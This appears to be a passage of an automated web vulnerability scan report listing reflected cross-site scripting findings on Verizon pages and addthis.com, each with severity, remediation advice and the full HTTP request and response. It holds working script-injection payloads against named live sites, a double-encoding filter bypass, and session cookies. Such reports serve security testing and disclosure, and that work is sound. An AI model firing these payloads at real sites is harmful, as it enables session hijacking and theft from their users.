<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
",d,k)};})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?a33e8(a)f8a98d8a3f7\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.28. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fedfb'-alert(1)-'12fea1b1512 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?fedfb'-alert(1)-'12fea1b1512=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA07V
Content-Type: text/html; charset=utf-8
Content-Length: 124879
Expires: Mon, 05 Sep 2011 22:42:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:42:09 GMT
Connection: close

<SCRIPT language=javascript>function checkforempty()
           {    

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?fedfb'-alert(1)-'12fea1b1512=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

2.29. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/templates/layers/setpreferences_generic.aspx

Issue detail

The value of the TabValue request parameter is copied into the HTML document as text between TITLE tags. The payload a5cda</title><script>alert(1)</script>1049536fafe9f8cfa was submitted in the TabValue parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TVa5cda</title><script>alert(1)</script>1049536fafe9f8cfa&__VIEWSTATE=%2FwEPDwUJOTA4NjkzMTc0D2QWAmYPZBYEZg8WAh4HVmlzaWJsZWgWAgIBDxBkZBYAZAICDxYCHwBoZGQ%3D&_ctl00_Template_Wrapper_Begin1_HdnPageName=&_ctl00_Template_Wrapper_Begin1_HdnPageTitle=&_ctl00_Template_Wrapper_Begin1_HdnPageUrl=&rdTV=FiOSTV&btnSave=Save HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV
Cache-Control: max-age=0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 8770
Expires: Mon, 05 Sep 2011 22:24:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="info">TVa5cda</title><script>alert(1)</script>1049536fafe9f8cfa Preferences</title>
...[SNIP]...

2.30. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/templates/layers/setpreferences_generic.aspx

Issue detail

The value of the TabValue request parameter is copied into the HTML document as text between TITLE tags. The payload d5c22</title><script>alert(1)</script>dfb8a62d6cb was submitted in the TabValue parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TVd5c22</title><script>alert(1)</script>dfb8a62d6cb HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 9701
Expires: Mon, 05 Sep 2011 22:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="info">TVd5c22</title><script>alert(1)</script>dfb8a62d6cb Preferences</title>
...[SNIP]...

2.31. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/templates/layers/setpreferences_generic.aspx

Issue detail

The value of the TabValue request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 864b1'%3balert(1)//a8a85d2d9972625a was submitted in the TabValue parameter. This input was echoed as 864b1';alert(1)//a8a85d2d9972625a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV864b1'%3balert(1)//a8a85d2d9972625a&__VIEWSTATE=%2FwEPDwUJOTA4NjkzMTc0D2QWAmYPZBYEZg8WAh4HVmlzaWJsZWgWAgIBDxBkZBYAZAICDxYCHwBoZGQ%3D&_ctl00_Template_Wrapper_Begin1_HdnPageName=&_ctl00_Template_Wrapper_Begin1_HdnPageTitle=&_ctl00_Template_Wrapper_Begin1_HdnPageUrl=&rdTV=FiOSTV&btnSave=Save HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV
Cache-Control: max-age=0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 8694
Expires: Mon, 05 Sep 2011 22:24:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="inf
...[SNIP]...
<script>closepreferenceswindow('tv864b1';alert(1)//a8a85d2d9972625a','','1') </script>
...[SNIP]...

2.32. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZCTC.serv

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8aa86"><script>alert(1)</script>0ad1c3f3b74 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=8aa86"><script>alert(1)</script>0ad1c3f3b74
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:26:53 GMT
Content-length: 2584
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
   <HEAD>
       <title>Your automated customer
...[SNIP]...
<input name="referer" id="referer" type="hidden" value="http://www.google.com/search?hl=en&q=8aa86"><script>alert(1)</script>0ad1c3f3b74"/>
...[SNIP]...

2.33. http://search.verizon.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d48e"-alert(1)-"9e05ad6cd4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tp=l&rv=l&q=xss&search.x=0&search.y=0 HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9d48e"-alert(1)-"9e05ad6cd4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss%20sq~~~~

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:56 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 50718


                   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
ev1.keywords="xss"; // Keyword
ev1.results="0"; // Number of results
ev1.attr1="l"; // Used for Attribute 1 Large Business template
ev1.attr2="_hbxStrip('http://www.google.com/search?hl=en&q=9d48e"-alert(1)-"9e05ad6cd4')";
ev1.attr3=""; // Used for Attribute 3
ev1.attr4=""; // Used for Attribute 4


//END EDITABLE SECTION


//REQUIRED SECTION. CHANGE "YOURSERVER" TO VALID LOCATION ON YOUR WEB
...[SNIP]...

2.34. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ac704%253cscript%253ealert%25281%2529%253c%252fscript%253e76327e8fb9c was submitted in the Referer HTTP header. This input was echoed as ac704<script>alert(1)</script>76327e8fb9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ac704%253cscript%253ealert%25281%2529%253c%252fscript%253e76327e8fb9c

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93416

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<h4>ac704<script>alert(1)</script>76327e8fb9c - 1 search</h4>
...[SNIP]...

